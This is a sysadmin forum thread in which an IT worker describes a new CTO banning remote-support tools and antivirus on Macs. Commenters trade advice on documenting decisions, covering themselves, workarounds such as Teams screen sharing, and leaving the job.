I just printed out a stack of multimillion dollar lawsuits against companies failing to properly secure client data, dropped it on his desk, and went to lunch. He approved everything I had asked for by the end of the day.
twitchd8@reddit
You're lucky. Your superior actually read the information you took the time and initiative to print.
andrewsmd87@reddit
I don't mean this to be gender specific for you but it fits as a response regardless :)
https://c.tenor.com/6FwBg2HbmKgAAAAC/tenor.gif
ishboo3002@reddit
I've had three malware incidents in the last month, all of them engineers on Macs; luckily our EDR caught them all.
Brilliant-Advisor958@reddit
One of my users fell for one of these but via a fake captcha on a trusted vendor's site.
The vendor was compromised and their site was pushing this.
Thankfully our EDR caught it and locked out the pc.
andrewsmd87@reddit
We are a full Windows shop. I'm not a Mac hater or MS fanboy, we just want to support one thing and for business related stuff, it just makes sense.
New CEO overrode all of our policies and we had to update our ISP to add an exception for him to have a Mac without any of our AV stuff because it didn't need it.
Took 4 months for it to get malware
w1ten1te@reddit
What does ISP mean in this context? It's clearly not Internet Service Provider.
andrewsmd87@reddit
Information security policy. The thing we make people agree to when they start and then every year to stay ISO compliant. Didn't even dawn on me that acronym would be confusing because I'm in info sec most of the time, sorry!
fencepost_ajm@reddit
Let insurance be the bad guy. "Sir, we can do that for you but the way our policies are written we'll be paying about $XXk more per month."
harubax@reddit
Exactly!
andrewsmd87@reddit
I did. His solution was the exception in our ISP. It was basically saying I'll tank the company if I get hacked because insurance won't cover this but I want my Mac
whtbrd@reddit
Also get in writing about the anti-virus. Might, maybe, be worth reaching out to someone from the CISO's office or GRC to see if there's a policy he's violating. In any case, get all these decisions he's making in writing. If nothing else, follow up with an email to him like so: "Just so I can reference this later, in our phone call you stated that it's a corporate policy that the service desk should not have any remote access tooling to be able to troubleshoot user issues. That any and all troubleshooting should be done via a phone call and... and I will comply with this moving forward." "...in our phone call you stated that I am not to install any anti-virus software on end user systems when they are Macs, which I will comply with moving forward."
FuckinHighGuy@reddit
Asking the CTO to put his words into writing isn’t going to go well for anyone except the CTO.
Substantial-Fruit447@reddit
You don't have to come right out and say it, but just send an email that makes it sound like you're looking for clarity or something.
And no, it has worked before. My previous CTO was fired for similar decisions that were pants-on-head retarded, and when enough complaints were going to the COO, CFO and to the CEO there was an inquiry.
All we had to produce were the emails from the CTO on those decisions.
r3rg54@reddit
Ok? Writing still doesn’t matter there, the volume of complaints does.
NDaveT@reddit
It matters when the CTO tries to blame OP for not using remote access tools.
Substantial-Fruit447@reddit
No, because it would have been me or someone on my team getting fired if we didn't have any evidence to the contrary of "The IT Department isn't helping anyone."
Or, in my case, "The IT department can't fix our network outages so we're bleeding away millions of dollars in revenue every hour."
The problem wasn't that we couldn't fix them, but that our CTO refused to extend budget to enhance network reliability and redundancy. They had already fired all of my predecessors for "not being agile enough to resolve outages for business operations" when it was actually our architecture, our equipment, and our reliance on single-line ISP feeds that were the issue.
what_dat_ninja@reddit
It was somewhat true at one point, but that was a very long time ago.
bacon59@reddit
30 year old myth due to shitty advertising by Mac. They got 80% less viruses because businesses didn't run on Mac back in the 90s like that and they had 80% less corporate marketshare
Vectan@reddit
+1 for this and I am a lifelong Mac user. Still need protection.
signal_lost@reddit
Also, MacBooks not needing Antivirus/EDR is a myth.
Apple doesn't use a 3rd party but that's because they USE XProtect & MRT, and rely heavily on Zero Trust.
Alpha-State_@reddit
S1 is your go-to antivirus for a corporate environment
wrt-wtf-@reddit
This is important. Macs have an inbuilt tool for remote access as does windows. But they aren’t the best option.
Mac is not impervious to malware, hacks, and viruses.
I would ensure that the conversations were at a minimum diarised and at best in minutes of a meeting shared with all parties involved.
At some stage the business will be compromised. Depending on the business, what it does, and its key customers the board of the business could come under direct scrutiny for its policies. Make sure that you are covered and that your advice/queries are noted and records maintained. CYA - cover your ass.
FauxReal@reddit
Getting the new policy in writing should definitely at least be a company-wide email and an entry in their intranet/help documentation on the subject.
I would not say, "so we can't help." That'll just get OP disciplined because the CTO did not say that. The CTO said to use video calls. Which is trash, but not saying OP can't help.
Emotional_Garage_950@reddit
dude sounds like either an idiot or it actually is definitely budget related.
use Teams screen share if that’s allowed, and provide the LAPS password to the user if elevation is required. Configure LAPS to rotate the password after it gets used
harrywwc@reddit
so much this ⬆️
this needs to be in writing so that when (not "if") the shit hits the fan, OP's arse will be covered.
of course, the blame will still fall on OP because that's what happens. :(
heinternets@reddit
What do you need remote access for? With Intune, Defender, Quick Assist, VPN, not sure why you need any other apps
DrTankHead@reddit
Because guiding a user to do anything is like pulling teeth and it's faster for a tech to fix it than have your end user play tech like it's KTaNE.
heinternets@reddit
You can’t use Quick Assist, or RDP via VPN?
DrTankHead@reddit
Quick assist is usually too basic. It works in a pinch but it's a far cry from a solution.
As for RDP, it'll boot the user out of their session. It can work, it can even work elegantly if you spend the effort to give each machine an ID# and use that as a hostname, I've worked with some healthcare institutions which do this and it is a godsend because at very least end users can read the giant yellow tag on the front of the computer, especially if you know the format the tag will be in.
But that doesn't solve the issue about it kicking them out of their session, so if you are working with a bug that exists only in a user's specific context (issues with Outlook, software not opening correctly, or your choice of an issue that exists only in their context), you run into an issue.
See, while I can RDP over to a machine with my choice of regular or elevated credentials depending on the situation, it doesn't change that I'm not that user.
While this CTO isn't gonna like to hear it, there are ABSOLUTELY cases where there is no option but to shell out for a remote access solution.
At least in healthcare there were times where I wished there was a giant red button on the computer that just said "Connect to IT" because even getting a user to click a desktop icon can be tedious.
phony_sys_admin@reddit
Genuinely what do people get out of posting AI fanfic?
Commercial_Growth343@reddit
I started my IT career at a call center taking help desk calls for multiple customers, in the 1990's. It was before remote access tools. At the time we called it 'over the shoulder'. I remember sitting in presentations where we were shown how to use a new 'over the shoulder' tool, the name of which I cannot remember, and everyone was in awe at how this would save us time, improve our resolution times but also be a great customer service win.
6SpeedBlues@reddit
Update the resume and get your search on. One of three things is going to happen:
- You are going to be terminated for not "doing your job." They will drum up ridiculous details about how you can't properly do your job and will not mention the fact that they handcuffed you from using the correct tools which would have made your job possible.
- You are going to be terminated as part of a "restructuring" that will be shifting your role elsewhere. This may already be well along the path and they are refusing to spend any money simply because they won't sign contracts for tools and services that they know will be of zero value once the responsibilities are shifted.
- The CTO will be pushed out or step down on their own. No way to know if they continue forward with another, equally inept individual at the helm or if they will rectify the problem.
Only the last one might provide a glimmer of hope, so you need to be looking to protect yourself BEFORE your situation is made worse by them.
Damdo54@reddit
If a decision isn't factual when it comes to IT, IT becomes SHIT. Start to read BOFH, Bastard Operator From Hell, and start to fight back. Defend your mind brotha or sistah !
BasicallyFake@reddit
Remote Access tools are an issue because of how they are designed. It's very difficult if not impossible to see valid installs vs invalid installs.
That said, this isn't that. This sounds kind of dumb. I suppose you could use something like Teams or Zoom as a remote session with the user but this all sounds like he's creating blind spots on purpose.
Leather-Arachnid-417@reddit
Oh you'll have RATs sure enough. You ain't gonna know where, but people are gonna be in your network.
Dry_Particular_5162@reddit
You should get this documented in an email with your CTO stating no remote access tools and no AV. He's going to regret this decision. It is not a matter of IF your network gets hacked but a matter of WHEN.
Just CYA and make sure you have it in writing.
chuckycastle@reddit
As much as I’d love to side with you, the real problem is obvious in your opening statement: “I’m the sole guy responsible for IT operations and infrastructure for my country at the company where I work.” That alone gives us all the information we need to make sense of why things don’t make sense. You want to draw up logical conversation for an illogical situation and environment.
Polyolygon@reddit
So… what do you do for admin credentials? Every user is an admin on their own device, or you have to pass along admin credentials for any administrative action? Both are horrible practices.
wakefield-wanderer@reddit
Flee. The users are going to riot and you will be blamed.
Hot-Comfort8839@reddit
Let his disaster fail.
TheDodoKiller@reddit
People in IT need to get out of their heads that they need remote access tools to do their jobs.
I’ve supported numerous businesses without it, just using google meet, zoom or teams screen sharing.
If you use remote access to fix your users’ issues, you devalue your time - your users build up a gradient that IT works for them and will fix their problems when they’re not busy using their machines.
Your users never learn how to perform basic troubleshooting steps themselves and end up blaming IT for their problems.
User education is how you create a lean, scalable IT function, and how you get out of doing quite so much donkey work and doing more of what (imo) you should be doing in improving infrastructure etc.
Horsemeatburger@reddit
Yes and no. We're on GWS and most of our clients are ChromeOS based, and while there are built-in remote access tools the need to remote in rarely arises because ChromeOS isn't as fragile as Windows and most issues we see which aren't user error are hardware related (and there the user can simply exchange their device for another one at any of our dispensers).
But for a typical Windows environment with a crap ton of security, MDM and other tools installed, and an OS vendor who is shooting off series of bug-infested updates which regularly brick major functionality, remote access is a must when your users aren't local.
Aside from ChromeOS, we also use Mac desktops and Linux workstations, and occasionally some issue requires remote access to fix (although most of the time ssh is enough).
The best user education is useless when most of the time fixing issues requires admin privileges and sometimes even privileged access to server infrastructure. These are privileges you most certainly don't want to hand out to your users.
TheDodoKiller@reddit
I don't disagree - and actually your example is great - I think where I was going with that was, you don't need it to do your job, nor does every task/troubleshoot require it, it's a nice to have, but it's not Needed.
I'll still disagree with the 'typical' windows environment requiring it - I just haven't experienced what you're referring to - a decent deferral and small test group for windows updates usually finds anything game-breaking.
Agree with you on server infrastructure troubleshooting obviously - but then that's not something you need a remote tool for an end user device for anyway. Privileges wise - I'm having a ton of fun with Intune EPM at the moment - you can truly tailor what elevated access can be used for. Combine it with LAPS for extreme cases and so long as you... screen share with your users to verify what they're doing... where's the issue.
thegreatcerebral@reddit
I'm going to start off with a banger and "No need. You can just guide the user over a video call..." is technically sound and correct. If you have Microsoft baked into everything then a Teams call becomes a RAT for visibility and you can drop links to files with SharePoint etc. etc. etc.
With that being said, typically the RATs have OTHER things tied to them but not always. I am assuming you are literally only using the ability to hop onto the system, fix it, and move on. Used to doing this very quickly and efficiently and now it is a hassle and has slowed you down from say 10 closures/hr. to 1 or 2 because you spend more time establishing the connection than you do actually helping.
I just finished reading the rest and yea, that's it.
Look this is one of those things where you just have to bite the bullet. Newco is newco and the boss is the boss. You can either go rogue IT (just don't) and find a way to get in or you just use the tools they give you and make sure you have everyone complain that it takes longer to get things fixed with the new method.
I'm not 100% on if the CTO is entirely *new* or if you are just saying it is the CTO from newco. If from newco, just remember that there is a reason they have the money to have bought you out. Does that mean they are doing it right? No. What it does mean is that whatever they are doing, they are able to do it and operate to the point where they can buy you. So don't try to change them. You can only keep showing how it would improve productivity. The other issue is you are possibly barking up the wrong tree. You don't truly know what the plans are for you guys with newco until it happens. At best, they could just control everything but allow you to continue working as is and just pay them to exist. At worst, whatever they bought you for, they figure out how to extract that and bring it into existing framework and then bye-bye. So it is best to just let productivity die, let the tickets build and just keep working. I'm guessing this isn't the US so I have no idea what your laws have for employee rights etc. but learn those ASAP and cover your butt always.
HLKturbo@reddit
happens often when ownership changes, if new management is making your job harder rather than easier, it's time to unfortunately move on bud.
twilighttwister@reddit
Start forwarding every impossible ticket to the CTO.
Fit_Indication_2529@reddit
In my experience, the best approach is not to challenge the CTO directly or turn every tooling decision into a fight. Instead, make the operational impact, security risk, and compliance exposure visible, document it clearly, and get leadership to acknowledge the tradeoff. It also gives the CTO a clear explanation of the risk and makes ownership of the decision explicit. If leadership chooses not to approve remote access, endpoint protection, local support, or other compensating controls, then the resulting support limitations, downtime, and compliance exposure should be documented as part of that decision.
Mr_Squinty@reddit
You are being constructively dismissed, get writing that resume/CV.
anmghstnet@reddit
My favorite line at an old job was "You're right, that's wrong, we aren't going to fix it."
JynxedByKnives@reddit
I would have my bags packed and ready with one foot out the door. No one likes a work environment where the upper management keeps the door shut and doesn't value your department. It's simply oppressive, and if I chose to stay, you bet those tickets would absolutely be piling up and I would take my sweet time on every call I had.
Alternatively, I'm sure you could probably squeak by unnoticed with 1-2 Zoom, Teams or TeamViewer licenses so you can help yourself or your small team with a crutch remote tool.
WhatsUpSteve@reddit
He's making stupid policies to force the merged team to resign so he doesn't have to pay severance.
Fatality@reddit
No worries ChatGPT
Apprehensive_Win7049@reddit
Keep giving him top rope to hang himself with. If you can't do your job because you don't have the right tools, treat work as a paid vacation. Let your end users get frustrated, and explain that you can't help them because of policy.
Someday you will have an angry end user with a little power and questions will start to get asked. Then and only then will you see progress.
In the meantime, keep your resume up to date, do what you can, explain what you can't, and let the CTO dig his own grave. You got this.
smoike@reddit
You forgot to document the imposed issues, document, document, document and cover your ass
Apprehensive_Win7049@reddit
Of course. Didn't want to write a novel.
liverwurst_man@reddit
Teams and Zoom do offer screen sharing and remote control. They worked well enough for my stint at a small global enterprise. Try them out!
egoomega@reddit
You should get that all in email “let me clarify Mr CTO that these are the expected tools available for support and EDR”
CYA - cover your ass
Electrical_Cap_4321@reddit
The whole “it’s a Mac, it doesn’t need any additional security” is a mindset that has to end. For years Apple computers have carried a reputation for being safer and more secure than traditional Windows machines. While there is truth behind this perception, it is significantly more nuanced than this.
OP, in your situation I would document everything. If your ticket system allows internal notes then you should also include pieces of information that are relevant. “End user took 5 minutes to open System Settings” or “had a script on previous system that could have resolved this known issue in 30 seconds. Unable to use due to no RMM.”
retrohobospot@reddit
Emails! Tickets and emails! If any of this is not in an email or ticket it didn’t happen
Icuras1701@reddit
I hope you are keeping a paper trail. Are you emailing him with a summary of your conversations? When push comes to shove he WILL say he told you to install an anti-virus and VNC. Some countries can hold you legally responsible for failure to protect data.
CarnageAsada-@reddit
Seems to me like your CTO is trying to accomplish something, either to purposely create chaos and or save a lot of money to get a fat raise at your expense. I would stop pushing the subject before you get fired and clock in/clock out while you find a better job for your peace of mind. It’s true things can get accomplished in a video call with teams but to an extent and slow as a slug.
harbengerprime@reddit
My absolute first thought is the CTO is trying to tank the IT team so they can outsource IT
smoike@reddit
That's assuming that elevated privileges or other restricted systems or processes aren't required. The level of insanity in the logic here blows my mind. It feels like there certainly has to be something underhanded going on here at an executive level. Does the CTO have a nephew that recently graduated that he might want to slide into your position?
CarnageAsada-@reddit
This
Connect-Ad6135@reddit
If you use Microsoft, do you use Teams? Start up a call and have the user share their screen to see the issue and troubleshoot from there. It may not be as easy as remoting in and taking over but it is an option.
harbengerprime@reddit
if whatever needs to be done requires admin access, Teams won't allow it
Chrismscotland@reddit
Big issue with Teams though is that you can't do anything that needs Admin Credentials as it's not supported.
Fair-Pudding1084@reddit
Make sure you saved the emails and video and commence malicious compliance.
tylerderped@reddit
And this is what happens when you put MBAs in charge of IT.
pdp10@reddit
If you had to guess at the background and enterprise IT experience level of this CTO, what would you guess?
Beginning_Ad1239@reddit
I'm guessing CEO's best friend who happened to take a technology management course a decade ago and thinks he knows what it all.
FuckinHighGuy@reddit
Bruh, you may want to clarify the last few words in that sentence.
Beginning_Ad1239@reddit
Oh wow. I was tired when I typed that one out. I'm leaving it lol
iwinsallthethings@reddit
Accounting major that used a computer to make some spreadsheets.
ArcanelogueKey@reddit
“Just guide the user over a video call” sounds like something a person says after never doing IT support a single day in their life
czenst@reddit
His response: "We don't need antivirus because we use MacBooks." Ask him what is written in the Cybersecurity Insurance Policy and exclusions - there is no way you get insured without EDR/AV on EVERY and EACH endpoint, doesn't matter what OS.
ThrobbingMeatGristle@reddit
Is your company one that requires Risk and Compliance Audits that have IT in scope? Do you have an audit department? If so these are normally the ones that ensure the company's risk tolerance limits are not being breached, and that will include how the CTO is instructed to act.
nurax7@reddit
Something's horribly wrong at that company. Hope you find a better opportunity soon my friend
garthoz@reddit
Quick Assist it. That's completely free.
After-Vacation-2146@reddit
Just start closing tickets as non resolvable. Eventually people will get pissed off and you can explain that without ability to remote in, you can’t solve certain types of issues.
nemor3@reddit
The remote access thing is annoying but workable. "No antivirus because MacBooks" is the part that should be in writing, dated, and stored somewhere safe. That's not a policy disagreement, that's a liability waiting for a date.
Outarel@reddit
Teams screen share + remote control exists as well. Not ideal but it's serviceable
fedesoundsystem@reddit
If no remote access tool is needed, just ditch active directory, and watch the world get on fire
binarypower@reddit
malicious compliance
BFguy@reddit
Surprised they haven't had you inject AI everywhere instead
wason92@reddit
That's not inflexible leadership. Leadership would imply some sort of logical thought (to them at least) and you just disagree, not allowing remote access is just stupid, there's no thought behind that.
No_Base4946@reddit
> "We don't need antivirus because we use MacBooks."
You've got all of this in emails, right? And you've got a personal copy of those emails somewhere safe, right?
We're talking lorry tarpaulin levels of arse-covering here.
Competitive_Smoke948@reddit
just do the calls as they come in. don't feel pressured not to take lunch or leave late.
when people start whining, just tell them that they'll have to escalate to the CTO & when they start escalating then you'll get some traction.
DON'T PUT YOURSELF OUT!!
RAVEN_STORMCROW@reddit
The most effective way to get the CTO to bend is to give the end users his email and phone number. Suggest that they email the CTO once or twice a day... begging for the remote tool so techs "can just fix it". Also, MS Teams has screen sharing and a "take control" feature... so no, not black and white.
spin81@reddit
That attitude is going to get you guys ransomwared.
TW-Twisti@reddit
Email to the CTO with CCs to relevant people like HR and CEO:
"Hello, per our last conversation I understand that going forward, we will no longer be allowed to use remote support tool XYZ and are not allowed nor are planning to switch to another remote support tool.
Due to the considerable increase of 800-2000% in support time that can be expected from this policy, should we schedule a meeting with HR to talk about the requirements for the new support staff that is coming to shoulder the load?
Please also advise as to the official company response to be given to all the remote employees unable to work while waiting for support in the coming weeks."
Either he ignores it and shit hits the fan, at which point you can point to your mail (BCC yourself so that if it gets deleted you have a copy), or he has to explain to HR why the support budget is going to go up by like 10,000% while they pay for tons of people who will be unable to work.
Always cover your ass, and make people confirm their poor decisions in writing after placing your warnings.
Adnubb@reddit
If you're in Europe, make sure you have that AV statement in writing at the very least. I might even try to report it somewhere. When shit hits the fan and a bunch of data gets leaked you might be held personally liable if you didn't do enough to remedy the situation due to GDPR laws.
No_Promotion451@reddit
We don't need remote support tools?
We don't need antivirus for Macs?
Make sure you capture this and document everything in case he throws you under the bus one day
smoike@reddit
When, not in case.
A relative of mine had this happen in a non-IT role. The term used by my relative's lawyer when they went after them was "constructive dismissal". The old boss ended up losing their job shortly after when the CEO found out what they did. It's a shame they didn't go before they put my relative through hell though.
The_Koplin@reddit
This is where my malicious compliance kicks in. Just have the users return the laptop to you so you can do the work, then ship it back.
InvisibleTextArea@reddit
Or book travel, hotels, restaurants etc on company time.
smokinbbq@reddit
That was my thought. Hmm, looks like I need admin access to complete this command. I can’t give that to you. Pack the laptop, ship to me, I’ll have it back in 5-7 business days. New policy from CTO.
skittle-brau@reddit
CTO: “Just give everyone admin access. Problem solved.”
perkia@reddit
"Sorry the call is breaking up, can you send me an email instead? Write in bold font, size 48 please"
uncertain_expert@reddit
My malicious compliance thought was that OP should start booking and expensing travel time, visiting his users in person. How else are they to verify that they are not being subjected to a phishing attack?
I suppose though that there’s probably still the option of MS Teams.
ReptilianLaserbeam@reddit
Oh wow. That reminds me when Covid hit I had to literally do that because the company was not prepared for remote work and they initially refused to pay for any licenses lol
NetworkDeestroyer@reddit
Looking forward to the malicious compliance post
catwiesel@reddit
yeah. usually in the "I can't believe this is happening" posts I can find something to suggest, at least for now, to move forward.
but this is absolutely a case for starting to look for another job and leaving. until you have something else, and I don't mean an offer, I mean signed, just go to work, say yes, do as he wants it done, then go home.
I don't think there is any hope for that company
AndyceeIT@reddit
It sucks, just make sure you get everything captured and documented to cover yourself when shit hits the fan.
Does your CTO happen to avoid sending instructions in such a format?
ultradip@reddit
Sometimes you have to sit back, relax, and let the train crash itself.
inucune@reddit
"Let burn."
nyckidryan@reddit
Document, document, document EVERYTHING along the way... CYA or be ready to GTFO.
highdiver_2000@reddit
Some of my customers have remote control and file sharing disabled in Teams.
Sure-Squirrel8384@reddit
Polish your resume and move on. CTO doesn't have a clue.
DisappointedSpectre@reddit
My bet is that they've got an MSP waiting in the wings offering kickbacks for them to take over everything.
Even if that's not the case you really don't want to ride this train to its final destination. As crap as the job market is right now I'd be looking nonstop in OP's position.
Thrizzlepizzle123123@reddit
I've done customer support IT for 10 years.
If my boss told me to guide users over the phone, I'd quit on the spot.
Let him figure that shit out.
Other-Illustrator531@reddit
Ya, OP is about to be made obsolete.
RevLoveJoy@reddit
In before "all these video calls are taking too long and not getting anything done! we're replacing all the support staff with AI, which is basically free. you're fired"
bazinguhd@reddit
Personally I am not alright with this kind of behavior from people who are supposedly my superiors, and this would absolutely trigger me leaving the company. Both because:
A) a leader needs to know when to follow and how to utilize the expertise of their team. No one can know everything and we all bring unique perspectives that we bring together to solve problems.
And
B) I would not put my name behind a company that has leadership qualifying data security with the Apple logo. This is just asking for bigger problems and neglect isn't how I operate.
Obviously leaving a company is always easier said than done, we all gotta eat. I would advise not leaving without another job lined up.
wodoloto@reddit
Have in writing all the bullshit he says. If that's over the phone - send him an e-mail, which summarises the call. Then, if you are overtasked because of the situation, make him decide how you should prioritise the tasks. Shit will hit the fan eventually and should target his face directly.
Bogus1989@reddit
I've been here before….
there's a fine line you can walk….
By the way, the best way to do this is not by still getting the job done, or wasting endless amounts of time finding an unapproved alternative, or "telling the end users how to fix it".
I'd send them one email (and when they'd respond that it didn't work, that'd be enough for me):
“emailed end user the solution”
If you cannot remotely access, the only other option is they ship the laptop or come in person.
I'd just keep transferring tickets back in the ticket software…
“out of scope for OP’s team, do not have access”
There are two ways I'd go with this… (by the way I am not advising at all what I'd do)
first?
you need a knowledge-base article, or a policy, step by step explaining what
“You can just guide the user over a video call”
means? for every problem, you need to treat each one like you are unaware what the standard operating procedure is… they removed your access without telling you how to continue doing it… you cannot guide an end user… they don't have access either. you no longer know admin credentials.
NOW,
here is where you may actually come out successful….
remember he said
“You can just guide the user over a video call”
Have end users broadcast their desktop in the video call, in zoom google meet or teams….
then request control.
😎. now you can “guide” the end user.
CommunicationClassic@reddit
Do you use Microsoft Teams or Zoom as an organization? It sucks for anything that requires admin access, but you can at least see their screen and take control of the mouse to do some basic stuff and see what's going on
CraigAT@reddit
While OP's situation is unfortunate, we generally try to help over Zoom (or Teams) first anyways, we can even ask the user to let us take control remotely.
If I remember correctly you can even guide the user to allow control for all apps, which allows you to see and enter info at the UAC prompt too (but make sure they turn that back off afterwards).
Luckily, we do have other remote tools but they are used only in a minority of cases now.
kombiwombi@reddit
My previous employer couldn't remotely log into staff laptops, and so IT co-workers used zoom to look at the screen and people typed what they were told.
blondasek1993@reddit
Had a similar problem a few years ago. I sent an update to his machine which caused a specific, multi-step-to-resolve issue. After two hours on the call with typing commands, multiple restarts and so on, the remote solution came back in less than a month.
jimicus@reddit
I work for a global company and we do acquisitions from time to time.
There’s something you need to get used to:
You don’t have the same employer any more. Your new employer does things completely differently - and by the sound of things, they expect you to be a dumb cog in their machine. Your options are to learn how your new employer does things or leave.
derpman86@reddit
How the hell do people like this get jobs?
VictorZ678@reddit
Nepotism.
HTDutchy_NL@reddit
Three options:
Deal with it and probably feel stuck in a crap position.
Polish resume and start looking.
Put on some big boy pants and write a report on the issues and risks created by standpoints of this "CTO". Make sure it is in language understandable by non IT specialists. Screw any chain of command and get it in the hands of someone who cares about the company and can do something about it.
Technically options 2 and 3 can be combined as an "I quit unless...".
Next_Airline_5980@reddit
I can understand the concern around remote access tools from a security/governance perspective, especially during a migration period where leadership is trying to simplify the environment.
That said, in hybrid environments the lack of remote visibility usually shifts a lot of troubleshooting overhead onto the end user. Even simple issues can turn into long calls if you can’t directly inspect logs, configs, or system state.
One thing that helped in a similar setup was documenting the operational impact over time:
Not even as a pushback exercise — more as a way to help leadership evaluate whether the current model is scaling as the company grows.
The important part is that you already raised the concern professionally and proposed solutions. At that point, aligning with the decision and keeping good operational metrics is probably the right move.
Dominionix@reddit
Time to update the CV!
Ok_Awareness_388@reddit
Get it in writing. Send an email confirming his instructions for no antivirus on all MacBooks.
fruymen@reddit
This exactly.
Get everything in writing.
If people complain you can show that it is not by your choice.
Circumpunctilious@reddit
tbh, someone asking for your stance in writing could be a warning that you’re butting heads, so phrasing the request positively, like “I want to be clear with the users” (or something more tailored) might be a good idea.
Stoneaid@reddit
PDF that email, store it online and offsite.
Gadgetman_1@reddit
CYA everything!
Print out every request and his responses, and keep those printouts safe. Shit WILL hit the rotary atmospheric agitator soon, and your address will be used when they start shipping pallets of blame.
Also, polish your CV and start applying.
jkeegan123@reddit
I might consider just quitting.
Or an aggressive job search while on long video troubleshooting calls culminating in quitting.
Several_Place2412@reddit
man, the 'we don't need antivirus because we use macbooks' line is an absolute classic. sounds like your cto is stuck in 2008. document everything in writing immediately because when the audit hits, he's going to point the finger right at you.
musicis_tere@reddit
Between you and the CTO is there another more qualified individual who understands this technically that you can correspond with? Maybe they might be able to convince them why this is important. Otherwise CTO has the mentality of doing just the bare minimum
sabertoothninja@reddit
Use the built in Windows support for now?
Angelworks42@reddit
I could send you actual virus reports from actual Macs in our organization - they do exist...
Fwiw a lot of insurance companies won't underwrite cyber security policies without written security plans in place and endpoint protection in place - it could end up costing your company a lot of money if something bad happens.
enufofthecrazy@reddit
Once had my manager say we don't use PowerShell cause we might break something. 800 staff in over 10 countries. Support team of 2. Um......ok?
Professional_Mix2418@reddit
I just deployed Microsoft Defender to the Macs with Intune. Similarly the Windows build was good and solid, what troubleshooting!? How-to questions can easily be done using a video call. Anything else, it is way quicker to just refresh the machine.
statix85@reddit
Just let the users know you cannot because of the CTO and they/their manager can complain to him directly. He'll send you an e-mail denying he ever said that and will ask you to "fix it".
XanII@reddit
What do I know. I do MFA checks every hour or two hours depending on if I am logged in as user or admin and usually both to any services we have. So I do two per hour and one per 2 hours. Constantly. So much fun when it happens during a Teams call or when I am deploying something in Azure. Last time I got MFA during a Teams call I could not end the meeting.
I even removed extra profiles from Outlook as I just couldn't deal with doing multiple MFAs every hour or two and then a singular one an hour later.
This inflexibility is just something out there now. Tech sucks. I never keep anything open in my browsers anymore. Someone wants me to 'quickly check something'. Sure buddy, let me start the login process. It will take some time as I always start from scratch.
As for Remote solutions in a merger? These 100% come always. Whatever you use is not good at all in the new place.
addybojangles@reddit
Dude, that is rough. Please keep us updated 🤣
Bulky-Blueberry5853@reddit
Your CTO is a retard, every org has a standard remote access tool. In my opinion, with a new standard retard I'd say start looking for a new job. I've dealt with dumbasses in high positions of power and the best bet is always to walk away. You wanna be a dumbass and make it applicable to everyone? Nope, I won't be part of that downfall.
Odd_Cauliflower_8004@reddit
Change job. Not only is he an asshole, but he does not understand anything regarding security. Godspeed.
Vulperffs@reddit
Simple. From now on if someone wants your support they need to come to your office. It's impossible to work without any remote support.
I also had a similar experience with Macs allowed in the environment and the users were the most technically illiterate possible. With issues they caused themselves. I ended up just not supporting Macs at all, made instructions, if someone had problems they could use Windows. Tickets stopped.
Walbabyesser@reddit
Yes, dealt with that kind of inflexibility and quickly decided to leave. So I was hunting for a new job and moved when I had one.
Life is too short to work like this every day 🤷🏻♂️
NetReaper@reddit
Simple: tell the CTO without remote access software you'll have to visit the people in person to help them.
Wolfram_And_Hart@reddit
Quick assist. It’s not perfect but it works.
Other-Illustrator531@reddit
What he is saying is, "you will not be working here much longer". Get job hunting now.
RevLoveJoy@reddit
It's this.
GenericCleverName73@reddit
Not at this level of both position and ignorance. If you have other employment options, I recommend exercising them.
Jewbobaggins@reddit
If it’s a M365 environment with E3 licenses, maybe they’re waiting for “remote help” to be included in July over licensing something new as a stop gap?
flucayan@reddit
Who cares? Put in your hours, collect a paycheck and go home.
NotAnOwl_@reddit
I would care if I had a cool job and all of a sudden, the work was now explaining to people how to solve their issues in a step-by-step video call.
Natirs@reddit
This every day. People care too much about the decisions of the higher ups. You gently voice your concern/opinion and call it a day. It's on your boss to figure out the rest. People worry too much about things they have no control over. All these knee jerk reactions get sorted out with a little bit of time where IT's hands are tied.
Drew707@reddit
I was going to say Quick Assist until you got up to the MacBook part. I think there is a Mac version, but I don't know anything about Mac administration, so not sure if that would be detected and you thrown out a window. I think your only real option is to document and catalog these tickets and the massive amount of labor waste they are causing and incorporate that number into any reporting you do.
doktormane@reddit
They're allowing them to use screen sharing via a Teams or Zoom call but I think OP had some tool that allowed a real time remote PowerShell session so he can run commands. I get OP's frustration and the new CTO sounds like a dumbass but I think he's overreacting a bit.
Intune=ensures proper config, monitoring and proactive remediation using scripts. Screen sharing= machine access for running one off commands directly from the machine, if needed.
Drew707@reddit
What's the compatibility of Macs with Intune like? Again, don't know shit about Mac, but I thought most people used something like Jamf or Kafka.
doktormane@reddit
I have no clue tbh. I know it can manage Mac and iOS but how well it does it or how reliable it is, I don't know.
essxjay@reddit
Intune is fine for iOS but as the above poster said, if you've got more than a handful of Macs and if you can afford it then Jamf is the way.
jumpinjezz@reddit
Intune can manage Macs, but it's clunky. For clients with more than a couple of Macs, we drop Intune and use Jamf.
FuckinHighGuy@reddit
Most just use JAMF for mb administration.
thefpspower@reddit
I would start logging the time it takes to solve a ticket and how much of that is fighting over remote access, maybe make a recording and show it to him because that's the only way for him to really understand. Then explain how much time per ticket remote access saves, so speak in corporate $$$ terms.
If that still goes nowhere depending on your dependency on this job I would either start using a free solution without saying anything or polish my resume.
If this is how you're starting this CTO is going to be a massive headache of avoiding investment in IT.
bananajr6000@reddit
I wouldn’t communicate with him at all and start looking for a different job
NotAnOwl_@reddit
I agree with you. If this guy can't already understand the massive amount of time remote access would save for his company, imagine what else he believes.
Unless his goal is training all his employees to be part-time level 0.5 IT support for some genius reasons we can't begin to imagine because he's so much on another level.
shemp33@reddit
Park all the tickets for that location.
Buy a plane ticket.
Go troubleshoot and resolve in person.
Fly home.
Turn in expense report.
They said do your job. They said remote access wasn’t needed. Hence, local access was the inferred alternate.
machacker89@reddit
That's kind of sneaky but classy at the same time. You definitely know how to think outside the box ;)
robreddity@reddit
Does your "CTO" know what ISO 27001 is? Or what a cyber insurance premium costs?
machacker89@reddit
Apparently not with the response the OP got. SIGH. Time to brush up the old resume
Xenophore@reddit
Time to update your résumé and move on.
phoenix823@reddit
The company that "bought" your company already had some sort of IT team right? It sounds like you're being purposefully setup to fail. If I had to guess, the CTO in the target organization didn't/doesn't want you guys. With no remote access your metrics will look like shit and he'll use that as an excuse to get support in another language and location.
codeman86@reddit
If you are using Microsoft Intune it gives you the ability for remote access, no other tools needed, just the proper license will do!
vennemp@reddit
How tf do these ppl get jobs?
dnuohxof-2@reddit
You don’t have a CTO. You have someone’s nephew who “was good with computers” once.
